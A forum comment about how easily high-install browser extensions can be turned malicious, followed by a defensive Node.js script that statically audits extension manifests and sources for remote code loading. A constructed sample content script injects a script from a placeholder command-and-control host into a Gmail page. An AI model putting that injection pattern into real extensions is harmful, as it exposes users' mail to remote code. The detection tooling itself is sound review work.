
It's really hard to overstate just how easy it is to exploit the garden. The extension API itself limits the system-wide mischief you can get up to, but if you have an extension with 100k+ users (either because you created it or you bought it from its original developer), it's extremely easy to slip something malicious in there, and you have a lot of data at your fingertips to sell.

I wish there at least seemed to be some degree of review or reasonable sandboxing here. The closest they come is disabling eval-style behavior in 'background' scripts, but there's nothing stopping you from running command & control scripts from a remote origin in a non-privileged context and then getting up to your evil mischief anyway. Or injecting malicious code directly into gmail tabs.
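The gap the comment describes (a background page hemmed in by the extension CSP, while a content script matched against a mail host pulls code from a remote origin and hands it to the page) is the kind of thing a store-side review could at least flag statically. The following is an added example, not code from the comment above or from any real extension: a small triage check in Node.js that takes an extension manifest and the text of its scripts and reports the pattern in question. The pattern identifiers, the sample manifest, the file names and the c2.example.invalid URL are all constructed here for illustration.

```javascript
// Static triage of a browser-extension package (added example, not from the
// original comment). It flags (1) access to a sensitive or wildcard host,
// (2) code in any script that loads or evaluates something from a remote
// origin, and (3) the combination the comment describes: remote code pulled
// in by a content script that is matched against a sensitive host.

// Source patterns that amount to loading remote code. No 'g' flag, so
// RegExp.prototype.test has no lastIndex state between calls.
const REMOTE_CODE_PATTERNS = [
  // fetch()/XHR of something, later handed to eval() or new Function()
  { id: 'remote-eval', re: /\b(fetch|XMLHttpRequest)\b[\s\S]*?\b(eval|new\s+Function)\s*\(/ },
  // a <script> element created and pointed at an http(s) URL
  { id: 'remote-script-tag', re: /createElement\s*\(\s*['"]script['"]\s*\)[\s\S]*?\.src\s*=\s*['"`]https?:\/\// },
  // dynamic import() of a non-extension URL
  { id: 'remote-import', re: /\bimport\s*\(\s*['"`]https?:\/\// },
];

// Host match patterns considered sensitive: the mail host named in the
// comment, plus the all-sites wildcards. Extend to taste.
function matchesSensitiveHost(pattern) {
  return pattern === '<all_urls>'
    || /^(\*|https?):\/\/\*\//.test(pattern)   // e.g. *://*/* or https://*/*
    || /mail\.google\.com/.test(pattern);
}

// manifest: parsed manifest.json (MV2 or MV3 field names are both read).
// sources: { fileName: sourceText } for the scripts in the package.
// Returns an array of findings; an empty array means nothing was flagged.
function auditExtension(manifest, sources) {
  const findings = [];

  // Collect every host pattern the extension asks for.
  const hosts = [];
  for (const cs of manifest.content_scripts || []) hosts.push(...(cs.matches || []));
  hosts.push(...(manifest.host_permissions || []), ...(manifest.permissions || []));
  const sensitive = hosts.filter(matchesSensitiveHost);
  if (sensitive.length) findings.push({ id: 'sensitive-host-access', detail: sensitive });

  // Which files run as content scripts (outside the extension page CSP).
  const contentFiles = new Set();
  for (const cs of manifest.content_scripts || []) for (const f of cs.js || []) contentFiles.add(f);

  for (const [file, text] of Object.entries(sources)) {
    for (const p of REMOTE_CODE_PATTERNS) {
      if (p.re.test(text)) findings.push({ id: p.id, file, contentScript: contentFiles.has(file) });
    }
  }

  // The exact combination from the comment: remote code loaded from a content
  // script while the extension is matched against a sensitive host.
  const remoteFromContent = findings.some(f => f.contentScript === true);
  if (remoteFromContent && sensitive.length) {
    findings.push({ id: 'remote-code-in-sensitive-context', detail: [...contentFiles] });
  }
  return findings;
}

// Constructed sample package (not a real extension). The background script
// is benign; the content script injects a <script src> from a remote origin.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: 'constructed-sample',
  version: '1.0',
  background: { service_worker: 'background.js' },
  host_permissions: ['https://mail.google.com/*'],
  content_scripts: [{ matches: ['https://mail.google.com/*'], js: ['content.js'] }],
};
const SAMPLE_SOURCES = {
  'background.js': "chrome.runtime.onInstalled.addListener(() => {\n  console.log('installed');\n});\n",
  'content.js': "const s = document.createElement('script');\n"
    + "s.src = 'https://c2.example.invalid/payload.js';\n"
    + "document.documentElement.appendChild(s);\n",
};

console.log(JSON.stringify(auditExtension(SAMPLE_MANIFEST, SAMPLE_SOURCES), null, 2));
```

Run on the sample, the audit reports sensitive-host-access, remote-script-tag on content.js, and the combined remote-code-in-sensitive-context finding; a package that only touches example.com and never loads remote code produces no findings. The check is a triage aid for a reviewer, not proof of malice: it reads source text, so obfuscated or runtime-assembled loaders will slip past it, which is exactly why it belongs beside manual review rather than in place of it.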



